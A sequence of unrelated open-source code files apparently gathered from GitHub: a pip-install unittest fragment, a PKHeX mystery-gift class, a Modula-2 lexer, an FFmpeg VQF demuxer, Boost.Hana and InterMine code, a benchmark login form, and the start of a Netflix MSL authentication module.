os.makedirs(custom_dir) # this test catches issue #158 subprocess.check_call('{0} install {1} --no-cache-dir --target="{2}"' \ ''.format(self.pip_exe, self.target_package, custom_dir)) if __name__ == '__main__': unittest.main()
{ "pile_set_name": "Github" }
using System; using System.Collections.Generic; using System.Linq; namespace PKHeX.Core { /// <summary> /// Generation 4 Mystery Gift Template File (Inner Gift Data, no card data) /// </summary> public sealed class PGT : DataMysteryGift, IRibbonSetEvent3, IRibbonSetEvent4 { public const int Size = 0x104; // 260 public override int Format => 4; public override int Level { get => IsManaphyEgg ? 1 : IsPokémon ? PK.Met_Level : 0; set { if (IsPokémon) PK.Met_Level = value; } } public override int Ball { get => IsPokémon ? PK.Ball : 0; set { if (IsPokémon) PK.Ball = value; } } private enum GiftType { Pokémon = 1, PokémonEgg = 2, Item = 3, Rule = 4, Seal = 5, Accessory = 6, ManaphyEgg = 7, MemberCard = 8, OaksLetter = 9, AzureFlute = 10, PokétchApp = 11, Ribbon = 12, PokéWalkerArea = 14 } public override string CardTitle { get => "Raw Gift (PGT)"; set { } } public override int CardID { get => -1; set { } } public override bool GiftUsed { get => false; set { } } public PGT() : this(new byte[Size]) { } public PGT(byte[] data) : base(data) { } public byte CardType { get => Data[0]; set => Data[0] = value; } // Unused 0x01 public byte Slot { get => Data[2]; set => Data[2] = value; } public byte Detail { get => Data[3]; set => Data[3] = value; } public override int ItemID { get => BitConverter.ToUInt16(Data, 0x4); set => BitConverter.GetBytes((ushort)value).CopyTo(Data, 0x4); } public PK4 PK { get => _pk ??= new PK4(Data.Slice(8, PokeCrypto.SIZE_4PARTY)); set { _pk = value; var data = value.Data.All(z => z == 0) ? value.Data : PokeCrypto.EncryptArray45(value.Data); data.CopyTo(Data, 8); } } public override byte[] Write() { // Ensure PGT content is encrypted var clone = (PGT)Clone(); clone.VerifyPKEncryption(); return clone.Data; } private PK4? _pk; /// <summary> /// Double checks the encryption of the gift data for Pokemon data. /// </summary> /// <returns>True if data was encrypted, false if the data was not modified.</returns> public bool VerifyPKEncryption() { if (!IsPokémon || BitConverter.ToUInt32(Data, 0x64 + 8) != 0) return false; EncryptPK(); return true; } private void EncryptPK() { byte[] ekdata = new byte[PokeCrypto.SIZE_4PARTY]; Array.Copy(Data, 8, ekdata, 0, ekdata.Length); ekdata = PokeCrypto.EncryptArray45(ekdata); ekdata.CopyTo(Data, 8); } private GiftType PGTGiftType { get => (GiftType)Data[0]; set => Data[0] = (byte)value; } public bool IsHatched => PGTGiftType == GiftType.Pokémon; public override bool IsEgg { get => PGTGiftType == GiftType.PokémonEgg || IsManaphyEgg; set { if (value) { PGTGiftType = GiftType.PokémonEgg; PK.IsEgg = true; } } } public bool IsManaphyEgg { get => PGTGiftType == GiftType.ManaphyEgg; set { if (value) PGTGiftType = GiftType.ManaphyEgg; } } public override bool EggEncounter => IsEgg; public override bool IsItem { get => PGTGiftType == GiftType.Item; set { if (value) PGTGiftType = GiftType.Item; } } public override bool IsPokémon { get => PGTGiftType == GiftType.Pokémon || PGTGiftType == GiftType.PokémonEgg || PGTGiftType == GiftType.ManaphyEgg; set { } } public override int Species { get => IsManaphyEgg ? 
490 : PK.Species; set => PK.Species = value; } public override IReadOnlyList<int> Moves { get => PK.Moves; set => PK.SetMoves(value); } public override int HeldItem { get => PK.HeldItem; set => PK.HeldItem = value; } public override bool IsShiny => PK.IsShiny; public override int Gender { get => PK.Gender; set => PK.Gender = value; } public override int Form { get => PK.AltForm; set => PK.AltForm = value; } public override int TID { get => (ushort)PK.TID; set => PK.TID = value; } public override int SID { get => (ushort)PK.SID; set => PK.SID = value; } public override string OT_Name { get => PK.OT_Name; set => PK.OT_Name = value; } public override int Location { get => PK.Met_Location; set => PK.Met_Location = value; } public override int EggLocation { get => PK.Egg_Location; set => PK.Egg_Location = value; } public override PKM ConvertToPKM(ITrainerInfo sav, EncounterCriteria criteria) { if (!IsPokémon) throw new ArgumentException(nameof(IsPokémon)); // template is already filled out, only minor mutations required PK4 pk4 = new PK4((byte[])PK.Data.Clone()) { Sanity = 0 }; if (!IsHatched && Detail == 0) { pk4.OT_Name = sav.OT; pk4.TID = sav.TID; pk4.SID = sav.SID; pk4.OT_Gender = sav.Gender; pk4.Language = sav.Language; } if (IsManaphyEgg) SetDefaultManaphyEggDetails(pk4, sav); SetPINGA(pk4, criteria); SetMetData(pk4, sav); var pi = pk4.PersonalInfo; pk4.CurrentFriendship = pk4.IsEgg ? pi.HatchCycles : pi.BaseFriendship; pk4.RefreshChecksum(); return pk4; } private void SetMetData(PK4 pk4, ITrainerInfo trainer) { if (!EggEncounter) { pk4.Met_Location = pk4.Egg_Location + 3000; pk4.Egg_Location = 0; pk4.MetDate = DateTime.Now; pk4.IsEgg = false; } else { pk4.Egg_Location += 3000; if (trainer.Generation == 4) SetUnhatchedEggDetails(pk4); else SetHatchedEggDetails(pk4); } } private static void SetDefaultManaphyEggDetails(PK4 pk4, ITrainerInfo trainer) { // Since none of this data is populated, fill in default info. pk4.Species = (int)Core.Species.Manaphy; pk4.Gender = 2; // Level 1 Moves pk4.Move1 = 294; pk4.Move1_PP = 20; pk4.Move2 = 145; pk4.Move2_PP = 30; pk4.Move3 = 346; pk4.Move3_PP = 15; pk4.Ability = (int)Ability.Hydration; pk4.FatefulEncounter = true; pk4.Ball = (int)Core.Ball.Poke; pk4.Version = GameVersion.Gen4.Contains(trainer.Game) ? trainer.Game : (int)GameVersion.D; pk4.Language = trainer.Language < (int)LanguageID.Korean ? trainer.Language : (int)LanguageID.English; pk4.Egg_Location = 1; // Ranger (will be +3000 later) } private void SetPINGA(PK4 pk4, EncounterCriteria criteria) { // Ability is forced already, can't force anything // todo: loop force the Nature/Gender // Generate IV uint seed = Util.Rand32(); if (pk4.PID == 1 || IsManaphyEgg) // Create Nonshiny seed = GeneratePID(seed, pk4); if (!IsManaphyEgg) seed = Util.Rand32(); // reseed, do not have method 1 correlation // Generate IVs if (pk4.IV32 == 0) // Ignore Nickname/Egg flag bits; none are set for varied-IV gifts. { uint iv1 = ((seed = RNG.LCRNG.Next(seed)) >> 16) & 0x7FFF; uint iv2 = ((RNG.LCRNG.Next(seed)) >> 16) & 0x7FFF; pk4.IV32 = iv1 | iv2 << 15; } } private static void SetHatchedEggDetails(PK4 pk4) { pk4.IsEgg = false; // Met Location & Date is modified when transferred to pk5; don't worry about it. 
pk4.EggMetDate = DateTime.Now; } private void SetUnhatchedEggDetails(PK4 pk4) { pk4.IsEgg = true; pk4.IsNicknamed = false; pk4.Nickname = SpeciesName.GetSpeciesNameGeneration(0, pk4.Language, Format); pk4.EggMetDate = DateTime.Now; } private static uint GeneratePID(uint seed, PK4 pk4) { do { uint pid1 = (seed = RNG.LCRNG.Next(seed)) >> 16; // low uint pid2 = (seed = RNG.LCRNG.Next(seed)) & 0xFFFF0000; // hi pk4.PID = pid2 | pid1; // sanity check gender for non-genderless PID cases } while (!pk4.IsGenderValid()); while (pk4.IsShiny) // Call the ARNG to change the PID pk4.PID = RNG.ARNG.Next(pk4.PID); return seed; } public static bool IsRangerManaphy(PKM pkm) { var egg = pkm.Egg_Location; if (!pkm.IsEgg) // Link Trade Egg or Ranger return egg == Locations.LinkTrade4 || egg == Locations.Ranger4; if (egg != Locations.Ranger4) return false; if (pkm.Language == (int)LanguageID.Korean) // never korean return false; var met = pkm.Met_Location; return met == Locations.LinkTrade4 || met == 0; } protected override bool IsMatchExact(PKM pkm, DexLevel evo) => false; protected override bool IsMatchDeferred(PKM pkm) => false; public bool RibbonEarth { get => PK.RibbonEarth; set => PK.RibbonEarth = value; } public bool RibbonNational { get => PK.RibbonNational; set => PK.RibbonNational = value; } public bool RibbonCountry { get => PK.RibbonCountry; set => PK.RibbonCountry = value; } public bool RibbonChampionBattle { get => PK.RibbonChampionBattle; set => PK.RibbonChampionBattle = value; } public bool RibbonChampionRegional { get => PK.RibbonChampionRegional; set => PK.RibbonChampionRegional = value; } public bool RibbonChampionNational { get => PK.RibbonChampionNational; set => PK.RibbonChampionNational = value; } public bool RibbonClassic { get => PK.RibbonClassic; set => PK.RibbonClassic = value; } public bool RibbonWishing { get => PK.RibbonWishing; set => PK.RibbonWishing = value; } public bool RibbonPremier { get => PK.RibbonPremier; set => PK.RibbonPremier = value; } public bool RibbonEvent { get => PK.RibbonEvent; set => PK.RibbonEvent = value; } public bool RibbonBirthday { get => PK.RibbonBirthday; set => PK.RibbonBirthday = value; } public bool RibbonSpecial { get => PK.RibbonSpecial; set => PK.RibbonSpecial = value; } public bool RibbonWorld { get => PK.RibbonWorld; set => PK.RibbonWorld = value; } public bool RibbonChampionWorld { get => PK.RibbonChampionWorld; set => PK.RibbonChampionWorld = value; } public bool RibbonSouvenir { get => PK.RibbonSouvenir; set => PK.RibbonSouvenir = value; } } }
{ "pile_set_name": "Github" }
#!/usr/bin/env ruby require_relative '../config/boot' require 'rake' Rake.application.run
{ "pile_set_name": "Github" }
/* * (c) copyright 1987 by the Vrije Universiteit, Amsterdam, The Netherlands. * See the copyright notice in the ACK home directory, in the file "Copyright". * * Author: Ceriel J.H. Jacobs */ /* L E X I C A L A N A L Y S E R F O R M O D U L A - 2 */ /* $Id$ */ #include <stdlib.h> #include <stdio.h> #include <string.h> #include "parameters.h" #include "debug.h" #include "alloc.h" #include "em_arith.h" #include "em_label.h" #include "assert.h" #include "LLlex.h" #include "input.h" #include "f_info.h" #include "Lpars.h" #include "class.h" #include "error.h" #include "idf.h" #include "def.h" #include "type.h" #include "warning.h" extern char *getwdir(); t_token dot, aside; struct type *toktype; int idfsize = IDFSIZE; int ForeignFlag; #ifdef DEBUG extern int cntlines; #endif int token_nmb = 0; int tk_nmb_at_last_syn_err = -ERR_SHADOW; extern char options[]; extern int flt_status; static void SkipComment(void) { /* Skip Modula-2 comments (* ... *). Note that comments may be nested (par. 3.5). */ register int ch, c; register int CommentLevel = 0; LoadChar(ch); if (ch == '$') { LoadChar(ch); switch(ch) { case 'F': /* Foreign; This definition module has an implementation in another language. In this case, don't generate prefixes in front of the names. Also, don't generate call to initialization routine. */ ForeignFlag = D_FOREIGN; break; case 'U': inidf['_'] = 1; break; case 'A': /* Extra array bound checks, on or off */ case 'R': /* Range checks, on or off */ { int on_on_minus = ch == 'R'; LoadChar(c); if (c == '-') { options[ch] = on_on_minus; break; } if (c == '+') { options[ch] = !on_on_minus; break; } ch = c; } /* fall through */ default: break; } } for (;;) { if (!(ch & 0200) && class(ch) == STNL) { LineNumber++; #ifdef DEBUG cntlines++; #endif } else if (ch == '(') { LoadChar(ch); if (ch == '*') CommentLevel++; else continue; } else if (ch == '*') { LoadChar(ch); if (ch == ')') { CommentLevel--; if (CommentLevel < 0) break; } else continue; } else if (ch == EOI) { lexerror("unterminated comment"); PushBack(); break; } LoadChar(ch); } } static struct string *GetString(int upto) { /* Read a Modula-2 string, delimited by the character "upto". */ register int ch; register struct string *str = (struct string *) Malloc((unsigned) sizeof(struct string)); register char *p; register int len; len = ISTRSIZE; str->s_str = p = Malloc((unsigned int) ISTRSIZE); while (LoadChar(ch), ch != upto) { if (!(ch & 0200) && class(ch) == STNL) { lexerror("newline in string"); LineNumber++; #ifdef DEBUG cntlines++; #endif break; } if (ch == EOI) { lexerror("end-of-file in string"); break; } *p++ = ch; if (p - str->s_str == len) { str->s_str = Realloc(str->s_str, (unsigned int) len + RSTRSIZE); p = str->s_str + len; len += RSTRSIZE; } } str->s_length = p - str->s_str; len = (str->s_length+(int)word_size) & ~((int)word_size-1); while (p - str->s_str < len) { *p++ = '\0'; } str->s_str = Realloc(str->s_str, (unsigned) len); if (str->s_length == 0) str->s_length = 1; /* ??? string length at least 1 ??? 
*/ return str; } static char *s_error = "illegal line directive"; static int getch(void) { register int ch; while (LoadChar(ch), (ch & 0200) && ch != EOI) { error("non-ascii '\\%03o' read", ch & 0377); } return ch; } void CheckForLineDirective(void) { register int ch = getch(); register int i = 0; char buf[IDFSIZE]; register char *c = buf; for (;;) { if (ch != '#') { PushBack(); return; } do { /* * Skip to next digit * Do not skip newlines */ ch = getch(); if (class(ch) == STNL || class(ch) == STEOI) { LineNumber++; error(s_error); return; } } while (class(ch) != STNUM); while (class(ch) == STNUM) { i = i*10 + (ch - '0'); ch = getch(); } while (ch != '"' && class(ch) != STNL && class(ch) != STEOI) ch = getch(); if (ch == '"') { c = buf; do { ch = getch(); if (c < &buf[IDFSIZE]) *c++ = ch; if (class(ch) == STNL || class(ch) == STEOI) { LineNumber++; error(s_error); return; } } while (ch != '"'); *--c = '\0'; do { ch = getch(); } while (class(ch) != STNL && class(ch) != STEOI); /* * Remember the file name */ if (class(ch) == STNL && strcmp(FileName,buf)) { FileName = Salloc(buf,(unsigned) strlen(buf) + 1); WorkingDir = getwdir(FileName); } } if (class(ch) == STEOI) { error(s_error); return; } LineNumber = i; } } static void CheckForLet() { register int ch; LoadChar(ch); if (ch != EOI) { if (class(ch) == STIDF) { lexerror("token separator required between identifier and number"); } PushBack(); } } int LLlex(void) { /* LLlex() is the Lexical Analyzer. The putting aside of tokens is taken into account. */ register t_token *tk = &dot; char buf[(IDFSIZE > NUMSIZE ? IDFSIZE : NUMSIZE) + 2]; register int ch, nch; toktype = error_type; if (ASIDE) { /* a token is put aside */ *tk = aside; ASIDE = 0; return tk->tk_symb; } token_nmb++; again: ch = getch(); tk->tk_lineno = LineNumber; switch (class(ch)) { case STNL: LineNumber++; #ifdef DEBUG cntlines++; #endif CheckForLineDirective(); goto again; case STSKIP: goto again; case STGARB: if ((unsigned) ch - 040 < 0137) { lexerror("garbage char %c", ch); } else lexerror("garbage char \\%03o", ch); goto again; case STSIMP: if (ch == '(') { LoadChar(nch); if (nch == '*') { SkipComment(); goto again; } PushBack(); } if (ch == '&') return tk->tk_symb = AND; if (ch == '~') return tk->tk_symb = NOT; return tk->tk_symb = ch; case STCOMP: LoadChar(nch); switch (ch) { case '.': if (nch == '.') { return tk->tk_symb = UPTO; } break; case ':': if (nch == '=') { return tk->tk_symb = BECOMES; } break; case '<': if (nch == '=') { return tk->tk_symb = LESSEQUAL; } if (nch == '>') { return tk->tk_symb = '#'; } break; case '>': if (nch == '=') { return tk->tk_symb = GREATEREQUAL; } break; default : crash("(LLlex, STCOMP)"); } PushBack(); return tk->tk_symb = ch; case STIDF: { register char *tag = &buf[0]; register struct idf *id; do { if (tag - buf < idfsize) *tag++ = ch; LoadChar(ch); if (ch == '_' && *(tag-1) == '_') { lexerror("an identifier may not contain two consecutive underscores"); } } while(in_idf(ch)); PushBack(); *tag = '\0'; if (*(tag - 1) == '_') { lexerror("last character of an identifier may not be an underscore"); } tk->TOK_IDF = id = str2idf(buf, 1); return tk->tk_symb = id->id_reserved ? id->id_reserved : IDENT; } case STSTR: { register struct string *str = GetString(ch); if (str->s_length == 1) { tk->TOK_INT = *(str->s_str) & 0377; toktype = char_type; free(str->s_str); free((char *) str); } else { tk->tk_data.tk_str = str; if (! 
fit((arith)(str->s_length), (int) word_size)) { lexerror("string too long"); } toktype = standard_type(T_STRING, 1, (arith)(str->s_length)); } return tk->tk_symb = STRING; } case STNUM: { /* The problem arising with the "parsing" of a number is that we don't know the base in advance so we have to read the number with the help of a rather complex finite automaton. */ enum statetp {Oct,OptHex,Hex,Dec,OctEndOrHex,End,OptReal,Real}; register enum statetp state; register int base = 8; register char *np = &buf[0]; *np++ = ch; state = is_oct(ch) ? Oct : Dec; LoadChar(ch); for (;;) { switch(state) { case Oct: while (is_oct(ch)) { if (np < &buf[NUMSIZE]) *np++ = ch; LoadChar(ch); } if (ch == 'B' || ch == 'C') { state = OctEndOrHex; break; } /* Fall Through */ case Dec: base = 10; while (is_dig(ch)) { if (np < &buf[NUMSIZE]) { *np++ = ch; } LoadChar(ch); } if (ch == 'D') state = OptHex; else if (is_hex(ch)) state = Hex; else if (ch == '.') state = OptReal; else { state = End; if (ch == 'H') base = 16; else PushBack(); } break; case OptHex: LoadChar(ch); if (is_hex(ch)) { if (np < &buf[NUMSIZE]) *np++ = 'D'; state = Hex; } else { state = End; ch = 'D'; PushBack(); } break; case Hex: while (is_hex(ch)) { if (np < &buf[NUMSIZE]) *np++ = ch; LoadChar(ch); } base = 16; state = End; if (ch != 'H') { lexerror("H expected after hex number"); PushBack(); } break; case OctEndOrHex: if (np < &buf[NUMSIZE]) *np++ = ch; LoadChar(ch); if (ch == 'H') { base = 16; state = End; break; } if (is_hex(ch)) { state = Hex; break; } PushBack(); ch = *--np; *np++ = '\0'; /* Fall through */ case End: { int ovfl = 0; *np = '\0'; if (np >= &buf[NUMSIZE]) { tk->TOK_INT = 1; lexerror("constant too long"); } else { /* The upperbound will be the same as when computed with something like max(unsigned long) / base (when base is even). The problem is that unsigned long or unsigned arith is not accepted by all compilers */ arith ubound = max_int[sizeof(arith)] / (base >> 1); np = &buf[0]; while (*np == '0') np++; tk->TOK_INT = 0; while (*np) { int c; if (is_dig(*np)) { c = *np++ - '0'; } else { assert(is_hex(*np)); c = *np++ - 'A' + 10; } if (tk->TOK_INT < 0 || tk->TOK_INT > ubound) { ovfl++; } tk->TOK_INT = tk->TOK_INT*base; if (tk->TOK_INT < 0 && tk->TOK_INT + c >= 0) { ovfl++; } tk->TOK_INT += c; } } toktype = card_type; if (ch == 'C' && base == 8) { toktype = char_type; if (ovfl != 0 || tk->TOK_INT>255 || tk->TOK_INT < 0) { lexwarning(W_ORDINARY, "character constant out of range"); } CheckForLet(); return tk->tk_symb = INTEGER; } if (options['l']) { if (base != 10) { LoadChar(ch); if (ch != 'D') { PushBack(); } } } if (ch == 'D' && (options['l'] || base == 10)) { if (options['l']) { /* Local extension: LONGCARD exists, so internally also longintorcard_type exists. */ toktype = longcard_type; if (ovfl == 0 && tk->TOK_INT >= 0 && tk->TOK_INT<=max_int[(int)long_size]) { toktype = longintorcard_type; } else if (! chk_bounds(tk->TOK_INT, full_mask[(int)long_size], T_CARDINAL)) { ovfl = 1; } } else { if (ovfl != 0 || tk->TOK_INT > max_int[(int)long_size] || tk->TOK_INT < 0) { ovfl = 1; } toktype = longint_type; } } else if (ovfl == 0 && tk->TOK_INT >= 0 && tk->TOK_INT<=max_int[(int)int_size]) { toktype = intorcard_type; } else if (! chk_bounds(tk->TOK_INT, full_mask[(int)int_size], T_CARDINAL)) { ovfl = 1; } if (ovfl) lexwarning(W_ORDINARY, "overflow in constant"); CheckForLet(); return tk->tk_symb = INTEGER; } case OptReal: /* The '.' could be the first of the '..' token. At this point, we need a look-ahead of two characters. 
*/ LoadChar(ch); if (ch == '.') { /* Indeed the '..' token */ PushBack(); PushBack(); state = End; base = 10; break; } state = Real; break; } if (state == Real) break; } /* a real real constant */ if (np < &buf[NUMSIZE]) *np++ = '.'; toktype = real_type; while (is_dig(ch)) { /* Fractional part */ if (np < &buf[NUMSIZE]) *np++ = ch; LoadChar(ch); } if (ch == 'D') { toktype = longreal_type; LoadChar(ch); if (ch == '+' || ch == '-' || is_dig(ch)) { ch = 'E'; PushBack(); } } if (ch == 'E') { /* Scale factor */ if (np < &buf[NUMSIZE]) *np++ = ch; LoadChar(ch); if (ch == '+' || ch == '-') { /* Signed scalefactor */ if (np < &buf[NUMSIZE]) *np++ = ch; LoadChar(ch); } if (is_dig(ch)) { do { if (np < &buf[NUMSIZE]) *np++ = ch; LoadChar(ch); } while (is_dig(ch)); } else { lexerror("bad scale factor"); } } *np++ = '\0'; PushBack(); tk->tk_data.tk_real = new_real(); if (np >= &buf[NUMSIZE]) { tk->TOK_RSTR = Salloc("0.0", 4); lexerror("real constant too long"); } else tk->TOK_RSTR = Salloc(buf, (unsigned) (np - buf)); CheckForLet(); flt_str2flt(tk->TOK_RSTR, &(tk->TOK_RVAL)); if (flt_status == FLT_OVFL) { lexwarning(W_ORDINARY, "overflow in floating point constant"); } return tk->tk_symb = REAL; /*NOTREACHED*/ } case STEOI: return tk->tk_symb = -1; case STCHAR: default: crash("(LLlex) Impossible character class"); /*NOTREACHED*/ } /*NOTREACHED*/ }
{ "pile_set_name": "Github" }
package org.intermine.webservice.server.search; /* * Copyright (C) 2002-2020 FlyMine * * This code may be freely distributed and modified under the * terms of the GNU Lesser General Public Licence. This should * be distributed with the code. See the LICENSE file for more * information or http://www.gnu.org/copyleft/lesser.html. * */ import javax.servlet.ServletContext; import org.intermine.webservice.server.WebService; import org.intermine.webservice.server.core.NoServiceException; import org.intermine.webservice.server.core.WebServiceServlet; /** @author Alex Kalderimis **/ public class QuickSearchServlet extends WebServiceServlet { private static final long serialVersionUID = -5506185356973283525L; @Override protected WebService getService(Method method) throws NoServiceException { ServletContext ctx = this.getServletContext(); switch (method) { case GET: return new QuickSearch(api, ctx); case POST: return new QuickSearch(api, ctx); default: throw new NoServiceException(); } } }
{ "pile_set_name": "Github" }
/* * VQF demuxer * Copyright (c) 2009 Vitor Sessak * * This file is part of FFmpeg. * * FFmpeg is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * FFmpeg is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with FFmpeg; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA */ #include "avformat.h" #include "libavutil/intreadwrite.h" typedef struct VqfContext { int frame_bit_len; uint8_t last_frame_bits; int remaining_bits; } VqfContext; static int vqf_probe(AVProbeData *probe_packet) { if (AV_RL32(probe_packet->buf) != MKTAG('T','W','I','N')) return 0; if (!memcmp(probe_packet->buf + 4, "97012000", 8)) return AVPROBE_SCORE_MAX; if (!memcmp(probe_packet->buf + 4, "00052200", 8)) return AVPROBE_SCORE_MAX; return AVPROBE_SCORE_MAX/2; } static void add_metadata(AVFormatContext *s, const char *tag, unsigned int tag_len, unsigned int remaining) { int len = FFMIN(tag_len, remaining); char *buf; if (len == UINT_MAX) return; buf = av_malloc(len+1); if (!buf) return; get_buffer(s->pb, buf, len); buf[len] = 0; av_metadata_set2(&s->metadata, tag, buf, AV_METADATA_DONT_STRDUP_VAL); } static int vqf_read_header(AVFormatContext *s, AVFormatParameters *ap) { VqfContext *c = s->priv_data; AVStream *st = av_new_stream(s, 0); int chunk_tag; int rate_flag = -1; int header_size; int read_bitrate = 0; int size; if (!st) return AVERROR(ENOMEM); url_fskip(s->pb, 12); header_size = get_be32(s->pb); st->codec->codec_type = AVMEDIA_TYPE_AUDIO; st->codec->codec_id = CODEC_ID_TWINVQ; st->start_time = 0; do { int len; chunk_tag = get_le32(s->pb); if (chunk_tag == MKTAG('D','A','T','A')) break; len = get_be32(s->pb); if ((unsigned) len > INT_MAX/2) { av_log(s, AV_LOG_ERROR, "Malformed header\n"); return -1; } header_size -= 8; switch(chunk_tag){ case MKTAG('C','O','M','M'): st->codec->channels = get_be32(s->pb) + 1; read_bitrate = get_be32(s->pb); rate_flag = get_be32(s->pb); url_fskip(s->pb, len-12); st->codec->bit_rate = read_bitrate*1000; st->codec->bits_per_coded_sample = 16; break; case MKTAG('N','A','M','E'): add_metadata(s, "title" , len, header_size); break; case MKTAG('(','c',')',' '): add_metadata(s, "copyright", len, header_size); break; case MKTAG('A','U','T','H'): add_metadata(s, "author" , len, header_size); break; case MKTAG('A','L','B','M'): add_metadata(s, "album" , len, header_size); break; case MKTAG('T','R','C','K'): add_metadata(s, "track" , len, header_size); break; case MKTAG('C','O','M','T'): add_metadata(s, "comment" , len, header_size); break; case MKTAG('F','I','L','E'): add_metadata(s, "filename" , len, header_size); break; case MKTAG('D','S','I','Z'): add_metadata(s, "size" , len, header_size); break; case MKTAG('D','A','T','E'): add_metadata(s, "date" , len, header_size); break; case MKTAG('G','E','N','R'): add_metadata(s, "genre" , len, header_size); break; default: av_log(s, AV_LOG_ERROR, "Unknown chunk: %c%c%c%c\n", ((char*)&chunk_tag)[0], ((char*)&chunk_tag)[1], ((char*)&chunk_tag)[2], ((char*)&chunk_tag)[3]); url_fskip(s->pb, FFMIN(len, header_size)); break; } header_size -= 
len; } while (header_size >= 0); switch (rate_flag) { case -1: av_log(s, AV_LOG_ERROR, "COMM tag not found!\n"); return -1; case 44: st->codec->sample_rate = 44100; break; case 22: st->codec->sample_rate = 22050; break; case 11: st->codec->sample_rate = 11025; break; default: st->codec->sample_rate = rate_flag*1000; break; } switch (((st->codec->sample_rate/1000) << 8) + read_bitrate/st->codec->channels) { case (11<<8) + 8 : case (8 <<8) + 8 : case (11<<8) + 10: case (22<<8) + 32: size = 512; break; case (16<<8) + 16: case (22<<8) + 20: case (22<<8) + 24: size = 1024; break; case (44<<8) + 40: case (44<<8) + 48: size = 2048; break; default: av_log(s, AV_LOG_ERROR, "Mode not suported: %d Hz, %d kb/s.\n", st->codec->sample_rate, st->codec->bit_rate); return -1; } c->frame_bit_len = st->codec->bit_rate*size/st->codec->sample_rate; av_set_pts_info(st, 64, 1, st->codec->sample_rate); return 0; } static int vqf_read_packet(AVFormatContext *s, AVPacket *pkt) { VqfContext *c = s->priv_data; int ret; int size = (c->frame_bit_len - c->remaining_bits + 7)>>3; pkt->pos = url_ftell(s->pb); pkt->stream_index = 0; if (av_new_packet(pkt, size+2) < 0) return AVERROR(EIO); pkt->data[0] = 8 - c->remaining_bits; // Number of bits to skip pkt->data[1] = c->last_frame_bits; ret = get_buffer(s->pb, pkt->data+2, size); if (ret<=0) { av_free_packet(pkt); return AVERROR(EIO); } c->last_frame_bits = pkt->data[size+1]; c->remaining_bits = (size << 3) - c->frame_bit_len + c->remaining_bits; return size+2; } static int vqf_read_seek(AVFormatContext *s, int stream_index, int64_t timestamp, int flags) { VqfContext *c = s->priv_data; AVStream *st; int ret; int64_t pos; st = s->streams[stream_index]; pos = av_rescale_rnd(timestamp * st->codec->bit_rate, st->time_base.num, st->time_base.den * (int64_t)c->frame_bit_len, (flags & AVSEEK_FLAG_BACKWARD) ? AV_ROUND_DOWN : AV_ROUND_UP); pos *= c->frame_bit_len; st->cur_dts = av_rescale(pos, st->time_base.den, st->codec->bit_rate * (int64_t)st->time_base.num); if ((ret = url_fseek(s->pb, ((pos-7) >> 3) + s->data_offset, SEEK_SET)) < 0) return ret; c->remaining_bits = -7 - ((pos-7)&7); return 0; } AVInputFormat vqf_demuxer = { "vqf", NULL_IF_CONFIG_SMALL("Nippon Telegraph and Telephone Corporation (NTT) TwinVQ"), sizeof(VqfContext), vqf_probe, vqf_read_header, vqf_read_packet, NULL, vqf_read_seek, .extensions = "vqf", };
{ "pile_set_name": "Github" }
/*! @file Defines `boost::hana::detail::variadic::reverse_apply`. @copyright Louis Dionne 2013-2016 Distributed under the Boost Software License, Version 1.0. (See accompanying file LICENSE.md or copy at http://boost.org/LICENSE_1_0.txt) */ #ifndef BOOST_HANA_DETAIL_VARIADIC_REVERSE_APPLY_HPP #define BOOST_HANA_DETAIL_VARIADIC_REVERSE_APPLY_HPP #include <boost/hana/config.hpp> #include <boost/hana/detail/variadic/reverse_apply/unrolled.hpp> BOOST_HANA_NAMESPACE_BEGIN namespace detail { namespace variadic { BOOST_HANA_CONSTEXPR_LAMBDA auto reverse_apply = [](auto&& f, auto&& ...x) -> decltype(auto) { return detail::variadic::reverse_apply_unrolled( static_cast<decltype(f)&&>(f), static_cast<decltype(x)&&>(x)... ); }; }} BOOST_HANA_NAMESPACE_END #endif // !BOOST_HANA_DETAIL_VARIADIC_REVERSE_APPLY_HPP
{ "pile_set_name": "Github" }
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <script src="/benchmark/js/jquery.min.js"></script> <script type="text/javascript" src="/benchmark/js/js.cookie.js"></script> <title>BenchmarkTest02678</title> </head> <body> <form action="/benchmark/hash-02/BenchmarkTest02678" method="POST" id="FormBenchmarkTest02678"> <div><label>Please enter your details:</label></div> <br/> <div><label>Email:</label></div> <div><input type="text" id="email" name="email"></input></div> <div><label>Password:</label></div> <div><input type="text" id="password" name="password" value=""></input></div> <div>&nbsp</div> <div><label>Parameter: BenchmarkTest02678 <BR> Value:</label> <input type="text" id="BenchmarkTest02678" name="BenchmarkTest02678" value="someSecret"></input></div> <br/> <div><input type="submit" value="Login" /></div> </form> </body> </html>
{ "pile_set_name": "Github" }
/** * Copyright (c) 2014-2017 Netflix, Inc. All rights reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ /** * <p>Preshared keys profile entity authentication factory.</p> * * @author Wesley Miaw <[email protected]> */ (function(require, module) { "use strict"; var EntityAuthenticationFactory = require('../entityauth/EntityAuthenticationFactory.js'); var EntityAuthenticationScheme = require('../entityauth/EntityAuthenticationScheme.js'); var AsyncExecutor = require("../util/AsyncExecutor.js"); var PresharedProfileAuthenticationData = require('../entityauth/PresharedProfileAuthenticationData.js'); var MslInternalException = require('../MslInternalException.js'); var MslError = require('../MslError.js'); var MslEntityAuthException = require('../MslEntityAuthException.js'); var SymmetricCryptoContext = require('../crypto/SymmetricCryptoContext.js'); var PresharedProfileAuthenticationFactory = module.exports = EntityAuthenticationFactory.extend({ /** * Construct a new preshared keys profile authentication factory instance. * * @param {KeySetStore} store key set store.} store preshared key store. * @param {AuthenticationUtils} authutils authentication utilities. */ init: function init(store, authutils) { init.base.call(this, 